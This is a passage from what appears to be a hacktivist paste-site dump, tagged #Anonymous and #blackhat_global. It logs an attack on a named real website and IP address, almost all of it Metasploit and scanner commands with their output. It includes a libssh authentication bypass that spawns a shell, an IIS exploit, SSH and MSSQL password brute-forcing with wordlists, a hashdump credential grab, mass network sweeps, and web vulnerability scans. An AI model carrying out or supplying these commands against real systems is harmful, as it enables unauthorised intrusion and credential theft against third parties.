  3691. root@blackbox:~# msfconsole
  3692.  
  3693. Attempting authentication bypass unpatched libssh
  3694.  
  3695. msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
  3696. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 184.154.192.250
  3697. rhosts => IPADDRESS
  3698. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 830
  3699. rport => 830
  3700. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true
  3701. spawn_pty => true
  3702. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true
  3703. verbose => true
  3704. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
  3705.  
  3706. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1
  3707. [*] Starting interaction with 1...
  3708.  
  3709. id
  3710.  
  3711. uname -a
  3712.  
  3713. tty
  3714.  
  3715.  
  3716. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute
  3717. action => Execute
  3718. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a
  3719. cmd => id; uname -a
  3720. msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
  3721.  
  3722.  
  3723.  
  3724. USE WMAP
  3725.  
  3726. msf5 > load wmap
  3727.  
  3728. .-.-.-..-.-.-..---..---.
  3729. | | | || | | || | || |-'
  3730. `-----'`-'-'-'`-^-'`-'
  3731. [WMAP 1.5.1] === et [ ] metasploit.com 2012
  3732. [*] Successfully loaded plugin: wmap
  3733.  
  3734.  
  3735. Clean
  3736. msf5 > wmap_sites -l
  3737.  
  3738. msf5 > wmap_sites -d 0
  3739. msf5 > wmap_targets -c
  3740. msf5 > wmap_targets -l
  3741.  
  3742.  
  3743. ADD THE SITE
  3744.  
  3745. msf5 > wmap_sites -a http://www.etours.cn/
  3746. [*] Site created.
  3747. msf5 > wmap_sites -l
  3748. [*] Available sites
  3749. ===============
  3750.  
  3751. Id Host Vhost Port Proto # Pages # Forms
  3752. -- ---- ----- ---- ----- ------- -------
  3753. 0 184.154.192.250 184.154.192.250 80 http 0 0
  3754.  
  3755. ADD THE TARGET
  3756.  
  3757. msf5 > wmap_targets -t 184.154.192.250
  3758. msf5 > wmap_targets -l
  3759. [*] Defined targets
  3760. ===============
  3761.  
  3762. Id Vhost Host Port SSL Path
  3763. -- ----- ---- ---- --- ----
  3764. 0 184.154.192.250 184.154.192.250 80 false /
  3765.  
  3766.  
  3767.  
  3768. RUN THE TEST
  3769.  
  3770. msf5 > wmap_run -t
  3771. [*] Testing target:
  3772. [*] Site: 184.154.192.250 (184.154.192.250)
  3773. [*] Port: 80 SSL: false
  3774. ============================================================
  3775. [*] Testing started. 2020-01-29 05:09:16 -0600
  3776. [*] Loading wmap modules...
  3777. [*] 39 wmap enabled modules loaded.
  3778. [*]
  3779. =[ SSL testing ]=
  3780. ============================================================
  3781. [*] Target is not SSL. SSL modules disabled.
  3782. [*]
  3783. =[ Web Server testing ]=
  3784. ============================================================
  3785. [*] Module auxiliary/scanner/http/http_version
  3786. [*] Module auxiliary/scanner/http/open_proxy
  3787. [*] Module auxiliary/admin/http/tomcat_administration
  3788. [*] Module auxiliary/admin/http/tomcat_utf8_traversal
  3789. [*] Module auxiliary/scanner/http/drupal_views_user_enum
  3790. [*] Module auxiliary/scanner/http/frontpage_login
  3791. [*] Module auxiliary/scanner/http/host_header_injection
  3792. [*] Module auxiliary/scanner/http/options
  3793. [*] Module auxiliary/scanner/http/robots_txt
  3794. [*] Module auxiliary/scanner/http/scraper
  3795. [*] Module auxiliary/scanner/http/svn_scanner
  3796. [*] Module auxiliary/scanner/http/trace
  3797. [*] Module auxiliary/scanner/http/vhost_scanner
  3798. [*] Module auxiliary/scanner/http/webdav_internal_ip
  3799. [*] Module auxiliary/scanner/http/webdav_scanner
  3800. [*] Module auxiliary/scanner/http/webdav_website_content
  3801. [*]
  3802. =[ File/Dir testing ]=
  3803. ============================================================
  3804. [*] Module auxiliary/scanner/http/backup_file
  3805. [*] Module auxiliary/scanner/http/brute_dirs
  3806. [*] Module auxiliary/scanner/http/copy_of_file
  3807. [*] Module auxiliary/scanner/http/dir_listing
  3808. [*] Module auxiliary/scanner/http/dir_scanner
  3809. [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
  3810. [*] Module auxiliary/scanner/http/file_same_name_dir
  3811. [*] Module auxiliary/scanner/http/files_dir
  3812. [*] Module auxiliary/scanner/http/http_put
  3813. [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
  3814. [*] Module auxiliary/scanner/http/prev_dir_same_name_file
  3815. [*] Module auxiliary/scanner/http/replace_ext
  3816. [*] Module auxiliary/scanner/http/soap_xml
  3817. [*] Module auxiliary/scanner/http/trace_axd
  3818. [*] Module auxiliary/scanner/http/verb_auth_bypass
  3819. [*]
  3820. =[ Unique Query testing ]=
  3821. ============================================================
  3822. [*] Module auxiliary/scanner/http/blind_sql_query
  3823. [*] Module auxiliary/scanner/http/error_sql_injection
  3824. [*] Module auxiliary/scanner/http/http_traversal
  3825. [*] Module auxiliary/scanner/http/rails_mass_assignment
  3826. [*] Module exploit/multi/http/lcms_php_exec
  3827. [*]
  3828. =[ Query testing ]=
  3829. ============================================================
  3830. [*]
  3831. =[ General testing ]=
  3832. ============================================================
  3833. [*] Done.
  3834.  
  3835.  
  3836.  
  3837. RUN THE EXPLOIT
  3838.  
  3839. msf5 > wmap_run -e
  3840.  
  3841.  
  3842.  
  3843. CHECK THE VULNERABILITIES
  3844.  
  3845. msf5 > wmap_vulns -l
  3846.  
  3847.  
  3848. EXECUTE VULNERABILITIES
  3849.  
  3850. msf > vulns
  3851.  
  3852.  
  3853. RUN DB_NMAP THROUGH METASPLOIT
  3854.  
  3855. msf5 > db_nmap 184.154.192.250 -Pn
  3856.  
  3857.  
  3858. msf5 > hosts
  3859.  
  3860.  
  3861. msf5 > hosts -c address,os_flavor
  3862.  
  3863.  
  3864. msf5 > hosts -c address,os_flavor -S Windows
  3865.  
  3866. msf5 > hosts -c address,os_flavor -S Windows -R
  3867.  
  3868. RHOSTS => 184.154.192.250
  3869.  
  3870. msf5 > services -h
  3871.  
  3872. msf5 > services -c name,info 184.154.192.250
  3873.  
  3874. msf5 > services -c name,info -S http
  3875.  
  3876.  
  3877. msf5 > services -c info,name -p 445
  3878.  
  3879. msf5 > services -c port,proto,state -p 70-81
  3880.  
  3881.  
  3882. msf5 > services -s http -c port 184.154.192.250
  3883.  
  3884. msf5 > search IIS
  3885.  
  3886. msf5 > use exploit/windows/iis/msadc
  3887.  
  3888. msf5 exploit(windows/iis/msadc) > run
  3889.  
  3890. msf5 > search mssql_login
  3891.  
  3892. Matching Modules
  3893. ================
  3894.  
  3895. # Name Disclosure Date Rank Check Description
  3896. - ---- --------------- ---- ----- -----------
  3897. 0 auxiliary/scanner/mssql/mssql_login normal No MSSQL Login Utility
  3898.  
  3899. msf5 > use auxiliary/scanner/mssql/mssql_login
  3900.  
  3901. msf5 auxiliary(scanner/mssql/mssql_login) > show options
  3902.  
  3903. msf5 auxiliary(scanner/mssql/mssql_login) > set USERNAME sa
  3904. msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /opt/commix/src/txt/passwords_john.txt
  3905. msf5 auxiliary(scanner/mssql/mssql_login) > run
  3906.  
  3907.  
  3908. msf5 auxiliary(scanner/mssql/mssql_login) > creds
  3909. Credentials
  3910. ===========
  3911.  
  3912. host origin service public private realm private_type JtR Format
  3913. ---- ------ ------- ------ ------- ----- ------------ ----------
  3914.  
  3915. msf5 auxiliary(scanner/mssql/mssql_login) > back
  3916. msf5 > loot -h
  3917. Usage: loot [options]
  3918. Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
  3919. Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]
  3920. Del: loot -d [addr1 addr2 ...]
  3921.  
  3922. -a,--add Add loot to the list of addresses, instead of listing
  3923. -d,--delete Delete *all* loot matching host and type
  3924. -f,--file File with contents of the loot to add
  3925. -i,--info Info of the loot to add
  3926. -t <type1,type2> Search for a list of types
  3927. -h,--help Show this help information
  3928. -S,--search Search string to filter by
  3929.  
  3930.  
  3931.  
  3932. Here’s an example of how one would populate the database with some ‘loot’.
  3933.  
  3934. msf exploit(usermap_script) > exploit
  3935.  
  3936. msf exploit(usermap_script) > use post/linux/gather/hashdump
  3937.  
  3938. msf post(hashdump) > show options
  3939.  
  3940. msf post(hashdump) > sessions -l
  3941.  
  3942. msf post(hashdump) > run
  3943.  
  3944.  
  3945. USE LOOT
  3946.  
  3947. msf post(hashdump) > loot
  3948.  
  3949. RELOAD ALL METASPLOIT MODULES
  3950.  
  3951. msf > reload_all
  3952.  
  3953. USE ARP_SWEEP
  3954.  
  3955. msf > use auxiliary/scanner/discovery/arp_sweep
  3956.  
  3957. msf auxiliary(arp_sweep) > show options
  3958.  
  3959. msf auxiliary(arp_sweep) > set RHOSTS TARGET/24
  3960.  
  3961. RHOSTS => TARGET/24
  3962.  
  3963. msf auxiliary(arp_sweep) > set THREADS 50
  3964.  
  3965. THREADS => 50
  3966.  
  3967. msf auxiliary(arp_sweep) > run
  3968.  
  3969. USE NMAP
  3970.  
  3971. msf > nmap -sn TARGET/24
  3972.  
  3973. msf > nmap -PU -sn TARGET/24
  3974.  
  3975. msf > nmap -O TARGET
  3976.  
  3977. SEARCH PORTSCAN
  3978.  
  3979. msf > search portscan
  3980.  
  3981. USE PORTSCAN
  3982.  
  3983. msf > use auxiliary/scanner/portscan/syn
  3984.  
  3985. msf auxiliary(syn) > set RHOSTS TARGET
  3986.  
  3987. RHOSTS => TARGET
  3988.  
  3989. msf auxiliary(syn) > set THREADS 200
  3990.  
  3991. THREADS => 200
  3992.  
  3993. msf auxiliary(syn) > run
  3994.  
  3995. SEARCH NAME_VERSION
  3996.  
  3997. msf > search name:_version
  3998.  
  3999. USE TELNET AUXILIARY SCANNER
  4000.  
  4001. msf > use auxiliary/scanner/telnet/telnet_version
  4002.  
  4003. msf auxiliary(telnet_version) > set RHOSTS TARGET/24
  4004.  
  4005. RHOSTS => TARGET/24
  4006.  
  4007. msf auxiliary(telnet_version) > set THREADS 100
  4008.  
  4009. THREADS => 100
  4010.  
  4011. msf auxiliary(telnet_version) > run
  4012.  
  4013. USE AUXILIARY SSH_VERSION
  4014.  
  4015. msf > use auxiliary/scanner/ssh/ssh_version
  4016.  
  4017. msf auxiliary(ssh_version) > show options
  4018.  
  4019. Module options (auxiliary/scanner/ssh/ssh_version):
  4020.  
  4021. Name Current Setting Required Description
  4022.  
  4023. ---- --------------- -------- -----------
  4024.  
  4025. RHOSTS yes The target address range or CIDR identifier
  4026.  
  4027. RPORT 22 yes The target port
  4028.  
  4029. THREADS 1 yes The number of concurrent threads
  4030.  
  4031. TIMEOUT 30 yes Timeout for the SSH probe
  4032.  
  4033. msf auxiliary(ssh_version) > set RHOSTS TARGET/24
  4034.  
  4035. RHOSTS => TARGET/24
  4036.  
  4037. msf auxiliary(ssh_version) > set THREADS 200
  4038.  
  4039. THREADS => 200
  4040.  
  4041. msf auxiliary(ssh_version) > run
  4042.  
  4043. USE ORACLE SCANNER
  4044.  
  4045. msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version
  4046.  
  4047. msf auxiliary(tnslsnr_version) > show options
  4048.  
  4049. Module options (auxiliary/scanner/oracle/tnslsnr_version):
  4050.  
  4051. Name Current Setting Required Description
  4052.  
  4053. ---- --------------- -------- -----------
  4054.  
  4055. RHOSTS yes The target address range or CIDR identifier
  4056.  
  4057. RPORT 1521 yes The target port
  4058.  
  4059. THREADS 1 yes The number of concurrent threads
  4060.  
  4061. msf auxiliary(tnslsnr_version) > set RHOSTS TARGET/24
  4062.  
  4063. RHOSTS => TARGET/24
  4064.  
  4065. msf auxiliary(tnslsnr_version) > set THREADS 200
  4066.  
  4067. THREADS => 200
  4068.  
  4069. msf auxiliary(tnslsnr_version) > run
  4070.  
  4071. USE OPEN_PROXY
  4072.  
  4073. msf auxiliary(open_proxy) > show options
  4074.  
  4075. Module options (auxiliary/scanner/http/open_proxy):
  4076.  
  4077. Name Current Setting Required Description
  4078.  
  4079. ---- --------------- -------- -----------
  4080.  
  4081. LOOKUP_PUBLIC_ADDRESS false no Enable test for retrieve public IP address via RIPE.net
  4082.  
  4083. MULTIPORTS true no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
  4084.  
  4085. RANDOMIZE_PORTS false no Randomize the order the ports are probed
  4086.  
  4087. RHOSTS 24.25.24.1-xx.xx.xx.xx.xx yes The target address range or CIDR identifier
  4088.  
  4089. RPORT 8080 yes The target port
  4090.  
  4091. SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
  4092.  
  4093. THREADS 200 yes The number of concurrent threads
  4094.  
  4095. UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
  4096.  
  4097. VERIFY_CONNECT true no Enable test for CONNECT method
  4098.  
  4099. VERIFY_HEAD false no Enable test for HEAD method
  4100.  
  4101. ValidCode 200,302 no Valid HTTP code for a successfully request
  4102.  
  4103. ValidPattern server: gws
  4104.  
  4105. USE SSH_LOGIN
  4106.  
  4107. msf > use auxiliary/scanner/ssh/ssh_login
  4108.  
  4109. msf auxiliary(ssh_login) > set RHOSTS TARGET
  4110.  
  4111. RHOSTS => TARGET
  4112.  
  4113. msf auxiliary(ssh_login) > set USERNAME root
  4114.  
  4115. USERNAME => root
  4116.  
  4117. msf auxiliary(ssh_login) > set PASS_FILE /root/password.txt
  4118.  
  4119. PASS_FILE => /root/password.txt
  4120.  
  4121. msf auxiliary(ssh_login) > set THREADS 2000
  4122.  
  4123. THREADS => 2000
  4124.  
  4125. msf auxiliary(ssh_login) > run
  4126.  
  4127. USE AUXILIARY DIR_SCANNER
  4128.  
  4129. msf > use auxiliary/scanner/http/dir_scanner
  4130.  
  4131. msf auxiliary(dir_scanner) > set THREADS 50
  4132.  
  4133. THREADS => 50
  4134.  
  4135. msf auxiliary(dir_scanner) > set RHOSTS TARGET
  4136.  
  4137. RHOSTS => TARGET
  4138.  
  4139. msf auxiliary(dir_scanner) > exploit
  4140.  
  4141. USE EMAIL_COLLECTOR
  4142.  
  4143. msf > use auxiliary/gather/search_email_collector
  4144.  
  4145. msf auxiliary(search_email_collector) > set DOMAIN TARGET
  4146.  
  4147. DOMAIN => TARGET
  4148.  
  4149. msf auxiliary(search_email_collector) > run
  4150.  
  4151. USE AUXILIARY SCANNER HTTP CRAWLER
  4152.  
  4153. msf > use auxiliary/scanner/http/crawler
  4154.  
  4155. msf auxiliary(crawler) > set RHOST TARGET
  4156.  
  4157. RHOST => TARGET
  4158.  
  4159. msf auxiliary(crawler) > run
  4160.  
  4161. [*] Crawling http://TARGET:80/...
  4162.  
  4163. [*] Crawl of http://TARGET:80/ complete
  4164.  
  4165. [*] Auxiliary module execution completed
  4166.  
  4167.  
  4168. openvasad -c add_user -u admin -r Admin
  4169.  
  4170. openvasmd --user=admin --new-password=admin
  4171.  
  4172. openvas_target_create “windows” TARGET “new_scan”
  4173.  
  4174. msf > load openvas
  4175.  
  4176. [*] Welcome to OpenVAS integration by kost and averagesecurityguy.
  4177.  
  4178. [*]
  4179.  
  4180. [*] OpenVAS integration requires a database connection. Once the
  4181.  
  4182. [*] database is ready, connect to the OpenVAS server using openvas_connect.
  4183.  
  4184. [*] For additional commands use openvas_help.
  4185.  
  4186. [*]
  4187.  
  4188. [*] Successfully loaded plugin: OpenVAS
  4189.  
  4190. msf > openvas_connect admin admin localhost 9390 ok
  4191.  
  4192. msf > openvas_help
  4193.  
  4194. [*] openvas_help Display this help
  4195.  
  4196. [*] openvas_debug Enable/Disable debugging
  4197.  
  4198. [*] openvas_version Display the version of the OpenVAS server
  4199.  
  4200. [*]
  4201.  
  4202. [*] CONNECTION
  4203.  
  4204. [*] ==========
  4205.  
  4206. [*] openvas_connect Connects to OpenVAS
  4207.  
  4208. [*] openvas_disconnect Disconnects from OpenVAS
  4209.  
  4210. [*]
  4211.  
  4212. [*] TARGETS
  4213.  
  4214. [*] =======
  4215.  
  4216. [*] openvas_target_create Create target
  4217.  
  4218. [*] openvas_target_delete Deletes target specified by ID
  4219.  
  4220. [*] openvas_target_list Lists targets
  4221.  
  4222. [*]
  4223.  
  4224. [*] TASKS
  4225.  
  4226. [*] =====
  4227.  
  4228. [*] openvas_task_create Create task
  4229.  
  4230. [*] openvas_task_delete Delete a task and all associated reports
  4231.  
  4232. [*] openvas_task_list Lists tasks
  4233.  
  4234. [*] openvas_task_start Starts task specified by ID
  4235.  
  4236. [*] openvas_task_stop Stops task specified by ID
  4237.  
  4238. [*] openvas_task_pause Pauses task specified by ID
  4239.  
  4240. [*] openvas_task_resume Resumes task specified by ID
  4241.  
  4242. [*] openvas_task_resume_or_start Resumes or starts task specified by ID
  4243.  
  4244. [*]
  4245.  
  4246. [*] CONFIGS
  4247.  
  4248. [*] =======
  4249.  
  4250. [*] openvas_config_list Lists scan configurations
  4251.  
  4252. [*]
  4253.  
  4254. [*] FORMATS
  4255.  
  4256. [*] =======
  4257.  
  4258. [*] openvas_format_list Lists available report formats
  4259.  
  4260. [*]
  4261.  
  4262. [*] REPORTS
  4263.  
  4264. [*] =======
  4265.  
  4266. [*] openvas_report_list Lists available reports
  4267.  
  4268. [*] openvas_report_delete Delete a report specified by ID
  4269.  
  4270. [*] openvas_report_import Imports an OpenVAS report specified by ID
  4271.  
  4272. [*] openvas_report_download Downloads an OpenVAS report specified by ID
  4273.  
  4274. msf > openvas_config_list
  4275.  
  4276. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4277.  
  4278. [+] OpenVAS list of configs
  4279.  
  4280. ID Name
  4281.  
  4282. -- ----
  4283.  
  4284. 085569ce-73ed-11df-83c3-002264764cea empty
  4285.  
  4286. 2d3f051c-55ba-11e3-bf43-406186ea4fc5 Host Discovery
  4287.  
  4288. 698f691e-7489-11df-9d8c-002264764cea Full and fast ultimate
  4289.  
  4290. 708f25c4-7489-11df-8094-002264764cea Full and very deep
  4291.  
  4292. 74db13d6-7489-11df-91b9-002264764cea Full and very deep ultimate
  4293.  
  4294. 8715c877-47a0-438d-98a3-27c7a6ab2196 Discovery
  4295.  
  4296. bbca7412-a950-11e3-9109-406186ea4fc5 System Discovery
  4297.  
  4298. daba56c8-73ec-11df-a475-002264764cea Full and fast
  4299.  
  4300. msf > openvas_target_list
  4301.  
  4302. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4303.  
  4304. [+] OpenVAS list of targets
  4305.  
  4306. ID Name Hosts Max Hosts In Use Comment
  4307.  
  4308. -- ---- ----- --------- ------ -------
  4309.  
  4310. 785ca141-93b1-4325-9117-040dbcd8297f “windows” TARGET 1 0 “new_scan”
  4311.  
  4312. b493b7a8-7489-11df-a3ec-002264764cea Localhost localhost 1 0
  4313.  
  4314.  
  4315. msf > openvas_task_create
  4316.  
  4317. [*] Usage: openvas_task_create <name> <comment> <config_id> <target_id>
  4318.  
  4319. msf > openvas_task_create "win" "test" 2d3f051c-55ba-11e3-bf43-406186ea4fc5 785ca141-93b1-4325-9117-040dbcd8297f
  4320.  
  4321. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4322.  
  4323. [*] f93de23e-ed04-4db9-9321-0e40d3c11d46
  4324.  
  4325. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4326.  
  4327. [+] OpenVAS list of tasks
  4328.  
  4329. ID Name Comment Status Progress
  4330.  
  4331. -- ---- ------- ------ --------
  4332.  
  4333. f93de23e-ed04-4db9-9321-0e40d3c11d46 win test New -1
  4334.  
  4335. msf > openvas_task_start f93de23e-ed04-4db9-9321-0e40d3c11d46
  4336.  
  4337. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4338.  
  4339. [*] <X><authenticate_response status='200' status_text='OK'><role>Admin</role><timezone>UTC</timezone><severity>nist</severity></authenticate_response><start_task_response status='202' status_text='OK, request submitted'><report_id>68e8a43f-8f06-4bc4-92a3-1fec76ea246b</report_id></start_task_response></X>
  4340.  
  4341.  
  4342. msf > openvas_task_list
  4343.  
  4344. /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
  4345.  
  4346. [+] OpenVAS list of tasks
  4347.  
  4348. ID Name Comment Status Progress
  4349.  
  4350. -- ---- ------- ------ --------
  4351.  
  4352. f93de23e-ed04-4db9-9321-0e40d3c11d46 win test Done -1
  4353.  
  4354. msf >
  4355.  
  4356. openvas_report_list
  4357.  
  4358. openvas_format_list
  4359.  
  4360. openvas_report_download 1 5 /root/Desktop report
  4361.  
  4362.  
  4363. CHECK THE SITE WITH SKIPFISH
  4364.  
  4365. root@blackbox:~# locate skipfish | grep bin
  4366. /usr/bin/skipfish
  4367. root@blackbox:~# locate dictionaries
  4368.  
  4369.  
  4370. root@blackbox:~# skipfish -S /usr/share/skipfish/dictionaries/complete.wl -o /tmp/scan http://etours.cn
  4371.  
  4372. EXAMPLES
  4373.  
  4374. Scan type: config
  4375.  
  4376. skipfish --config config/example.conf http://example.com
  4377.  
  4378. Scan type: quick
  4379.  
  4380. skipfish -o output/dir/ http://example.com
  4381.  
  4382. Scan type: extensive bruteforce
  4383.  
  4384. skipfish [...other options..] -S dictionaries/complete.wl
  4385.  
  4386. http://example.com
  4387.  
  4388. Scan type: without bruteforcing
  4389.  
  4390. skipfish [...other options..] -LY http://example.com
  4391.  
  4392. Scan type: authenticated (basic)
  4393.  
  4394. skipfish [...other options..] -A username:password http://example.com
  4395.  
  4396. Scan type: authenticated (cookie)
  4397.  
  4398. skipfish [...other options..] -C jsession=myauthcookiehere -X /logout
  4399.  
  4400. http://example.com
  4401.  
  4402. Scan type: flaky server
  4403.  
  4404. skipfish [...other options..] -l 5 -g 2 -t 30 -i 15 http://example.com
  4405.  
  4406. OPEN SKIPFISH RESULTS WITH FIREFOX
  4407.  
  4408. In terminal:
  4409.  
  4410. Report
  4411.  
  4412. ------
  4413.  
  4414. A report has been generated in the file /tmp/scan_report
  4415.  
  4416. Open /tmp/scan_report/index.html with a browser to see this report
  4417.  
  4418.  
  4419. CHECK THE SITE WITH WAPITI
  4420.  
  4421. root@blackbox:~# aptitude install wapiti
  4422.  
  4423. root@blackbox:~# wapiti --url http://etours.cn/ --scope folder -v 1 -f html -o /tmp/scan_report
  4424.  
  4425.  
  4426. USE BLINDELEPHANT
  4427.  
  4428. root@blackbox:~# cd /opt/
  4429. root@blackbox:/opt# git clone https://github.com/lokifer/BlindElephant.git
  4430. root@blackbox:/opt# cd BlindElephant/src/
  4431. root@blackbox:/opt/BlindElephant/src# python setup.py install
  4432.  
  4433. root@blackbox:/opt/BlindElephant/src# BlindElephant.py etours.cn movabletype
  4434.  
  4435. root@blackbox:/opt/BlindElephant/src# BlindElephant.py etours.cn guess
  4436.  
  4437. Probing...
  4438.  
  4439. ACUNETIX SCAN
  4440. https://pasteboard.co/ISeK7WC.jpg
  4441.  
  4442. https://pasteboard.co/ISeKyZk.jpg
  4443.  
  4444. #Anonymous #TheCreed #blackhat_global #GBN
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement